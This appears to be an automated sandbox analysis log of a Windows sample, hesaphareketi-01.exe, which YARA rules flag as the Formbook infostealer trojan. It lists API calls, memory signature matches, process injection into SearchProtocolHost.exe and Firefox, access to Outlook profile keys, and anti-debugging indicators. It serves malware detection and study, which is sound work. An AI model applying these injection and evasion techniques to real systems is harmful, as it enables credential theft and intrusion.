        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D2F00 NtCreateFile,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D2E50 NtCreateSection,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D2E00 NtQueueApcThread,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D2ED0 NtResumeThread,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D2D10 NtQuerySystemInformation,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D2DA0 NtReadVirtualMemory,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D2C50 NtUnmapViewOfSection,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D2C30 NtMapViewOfSection,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D2CF0 NtDelayExecution,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D2B20 NtQueryInformationProcess
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D2BE0 NtQueryVirtualMemory
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D2AA0 NtQueryInformationFile
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D29D0 NtWaitForSingleObject
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D2F30 NtOpenDirectoryObject
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D2FB0 NtSetValueKey
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D2EC0 NtQuerySection
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D2EB0 NtProtectVirtualMemory
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D2E80 NtCreateProcessEx
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D2D50 NtWriteVirtualMemory
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D2DC0 NtAdjustPrivilegesToken
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D3C30 NtOpenProcessToken
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D2C20 NtSetInformationFile
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D2C10 NtOpenProcess
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D2CD0 NtEnumerateKey
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D3C90 NtOpenThread
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_02DB5090 NtAllocateVirtualMemory
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_02DB4EE0 NtDeleteFile
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_02DB4E20 NtReadFile
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_02DB4F60 NtClose
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_02DB4CF0 NtCreateFile
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe; Code function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe; File created: C:\Windows\resources\0409
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 0378B910 appears 264 times
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 037E7BE4 appears 85 times
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 0381EF10 appears 98 times
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 0380E692 appears 71 times
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 037D5050 appears 35 times
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe Section loaded: edgegdi.dll
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Section loaded: edgegdi.dll
        Source: hesaphareketi-01.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000013.00000002.5795631450.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000013.00000002.5795764214.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000C.00000002.5796633331.0000000002B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/11@19/17
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403373
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_00404873 GetDiskFreeSpaceW,MulDiv,0_2_00404873
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_004020FE CoCreateInstance,0_2_004020FE
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe File created: C:\Users\Public\Pictures\Kenotism
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe File created: C:\Users\user\AppData\Local\Temp\nsd30CB.tmp
        Source: hesaphareketi-01.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe File read: C:\Users\desktop.ini
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: hesaphareketi-01.exeVirustotal: Detection: 18%
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe File read: C:\Users\user\Desktop\hesaphareketi-01.exe
        Source: unknownProcess created: C:\Users\user\Desktop\hesaphareketi-01.exe C:\Users\user\Desktop\hesaphareketi-01.exe
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Users\user\Desktop\hesaphareketi-01.exe C:\Users\user\Desktop\hesaphareketi-01.exe
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeProcess created: C:\Windows\SysWOW64\SearchProtocolHost.exe C:\Windows\SysWOW64\SearchProtocolHost.exe
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
        Source: hesaphareketi-01.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: wntdll.pdb source: SearchProtocolHost.exe
        Source: Binary string: SearchProtocolHost.pdbUGP source: iyGEtqCQDnvMouCuszv.exe, 0000000C.00000003.1297585062.0000000000F0D000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: SearchProtocolHost.pdb source: iyGEtqCQDnvMouCuszv.exe, 0000000C.00000003.1297585062.0000000000F0D000.00000004.00000001.00020000.00000000.sdmp

        Data Obfuscation

        Source: Yara matchFile source: 00000000.00000002.1275057239.0000000008E1E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.1273244307.000000000078C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: hesaphareketi-01.exe PID: 9444, type: MEMORYSTR
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 12_2_00FDA8B9 push edi; ret 12_2_00FDA8BA
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 12_2_00FE794F push ebp; iretd 12_2_00FE7967
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 12_2_00FE7946 push ebp; iretd 12_2_00FE7967
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 12_2_00FC7142 pushad ; retf 12_2_00FC7156
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 12_2_00FD8377 push cs; retf 12_2_00FD8392
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 12_2_00FC734C push 0000005Fh; iretd 12_2_00FC7366
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 12_2_00FEDC5E push eax; ret 12_2_00FEDC60
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 12_2_00FDD506 push ds; ret 12_2_00FDD51A
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 12_2_00FD46D1 push 0000001Bh; ret 12_2_00FD46DF
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037908CD push ecx; mov dword ptr [esp], ecx19_2_037908D6
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_02DB837F push eax; ret 19_2_02DB8381
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe File created (dropped file): C:\Users\user\AppData\Local\Temp\nsj313A.tmp\LangDLL.dll
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe File created (dropped file): C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D1763 rdtsc 19_2_037D1763
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Window / User API: threadDelayed 9852
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI coverage: 3.2 %
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe TID: 9184 Thread sleep time: -145000s >= -30000s
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe TID: 9184 Thread sleep count: 67 > 30
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe TID: 9184 Thread sleep time: -100500s >= -30000s
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe TID: 9184 Thread sleep count: 75 > 30
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe TID: 9184 Thread sleep time: -75000s >= -30000s
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 8228 Thread sleep count: 120 > 30
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 8228 Thread sleep time: -240000s >= -30000s
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 8228 Thread sleep count: 9852 > 30
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 8228 Thread sleep time: -19704000s >= -30000s
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Last function: Thread delayed
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_00402862 FindFirstFileW,0_2_00402862
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_004065C5 FindFirstFileW,FindClose,0_2_004065C5
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405990
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_02DAC020 FindFirstFileW,FindNextFileW,FindClose,19_2_02DAC020
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeAPI call chain: ExitProcess graph end nodegraph_0-4520
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeAPI call chain: ExitProcess graph end nodegraph_0-4527
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Process information queried: ProcessInformation
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Process queried: DebugPort
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D1763 rdtsc 19_2_037D1763
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D4260 NtSetContextThread,LdrInitializeThunk,19_2_037D4260
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B237A mov eax, dword ptr fs:[00000030h]19_2_037B237A
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0382327E mov eax, dword ptr fs:[00000030h]19_2_0382327E
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0382327E mov eax, dword ptr fs:[00000030h]19_2_0382327E
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0382327E mov eax, dword ptr fs:[00000030h]19_2_0382327E
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03796179 mov eax, dword ptr fs:[00000030h]19_2_03796179
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037E717A mov eax, dword ptr fs:[00000030h]19_2_037E717A
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037E717A mov eax, dword ptr fs:[00000030h]19_2_037E717A
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C716D mov eax, dword ptr fs:[00000030h]19_2_037C716D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C415F mov eax, dword ptr fs:[00000030h]19_2_037C415F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_038651B6 mov eax, dword ptr fs:[00000030h]19_2_038651B6
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378A147 mov eax, dword ptr fs:[00000030h]19_2_0378A147
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378A147 mov eax, dword ptr fs:[00000030h]19_2_0378A147
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378A147 mov eax, dword ptr fs:[00000030h]19_2_0378A147
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C7128 mov eax, dword ptr fs:[00000030h]19_2_037C7128
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C7128 mov eax, dword ptr fs:[00000030h]19_2_037C7128
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C0118 mov eax, dword ptr fs:[00000030h]19_2_037C0118
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_038581EE mov eax, dword ptr fs:[00000030h]19_2_038581EE
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_038581EE mov eax, dword ptr fs:[00000030h]19_2_038581EE
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B510F mov eax, dword ptr fs:[00000030h]19_2_037B510F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B510F mov eax, dword ptr fs:[00000030h]19_2_037B510F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B510F mov eax, dword ptr fs:[00000030h]19_2_037B510F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B510F mov eax, dword ptr fs:[00000030h]19_2_037B510F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B510F mov eax, dword ptr fs:[00000030h]19_2_037B510F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B510F mov eax, dword ptr fs:[00000030h]19_2_037B510F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B510F mov eax, dword ptr fs:[00000030h]19_2_037B510F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B510F mov eax, dword ptr fs:[00000030h]19_2_037B510F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B510F mov eax, dword ptr fs:[00000030h]19_2_037B510F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B510F mov eax, dword ptr fs:[00000030h]19_2_037B510F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B510F mov eax, dword ptr fs:[00000030h]19_2_037B510F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B510F mov eax, dword ptr fs:[00000030h]19_2_037B510F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B510F mov eax, dword ptr fs:[00000030h]19_2_037B510F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379510D mov eax, dword ptr fs:[00000030h]19_2_0379510D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037891F0 mov eax, dword ptr fs:[00000030h]19_2_037891F0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037891F0 mov eax, dword ptr fs:[00000030h]19_2_037891F0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A01F1 mov eax, dword ptr fs:[00000030h]19_2_037A01F1
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A01F1 mov eax, dword ptr fs:[00000030h]19_2_037A01F1
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A01F1 mov eax, dword ptr fs:[00000030h]19_2_037A01F1
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037BF1F0 mov eax, dword ptr fs:[00000030h]19_2_037BF1F0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037BF1F0 mov eax, dword ptr fs:[00000030h]19_2_037BF1F0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037881EB mov eax, dword ptr fs:[00000030h]19_2_037881EB
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379A1E3 mov eax, dword ptr fs:[00000030h]19_2_0379A1E3
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379A1E3 mov eax, dword ptr fs:[00000030h]19_2_0379A1E3
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379A1E3 mov eax, dword ptr fs:[00000030h]19_2_0379A1E3
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379A1E3 mov eax, dword ptr fs:[00000030h]19_2_0379A1E3
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379A1E3 mov eax, dword ptr fs:[00000030h]19_2_0379A1E3
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037991E5 mov eax, dword ptr fs:[00000030h]19_2_037991E5
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037991E5 mov eax, dword ptr fs:[00000030h]19_2_037991E5
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0381A130 mov eax, dword ptr fs:[00000030h]19_2_0381A130
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A01C0 mov eax, dword ptr fs:[00000030h]19_2_037A01C0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A01C0 mov eax, dword ptr fs:[00000030h]19_2_037A01C0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0384F13E mov eax, dword ptr fs:[00000030h]19_2_0384F13E
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A51C0 mov eax, dword ptr fs:[00000030h]19_2_037A51C0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A51C0 mov eax, dword ptr fs:[00000030h]19_2_037A51C0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A51C0 mov eax, dword ptr fs:[00000030h]19_2_037A51C0
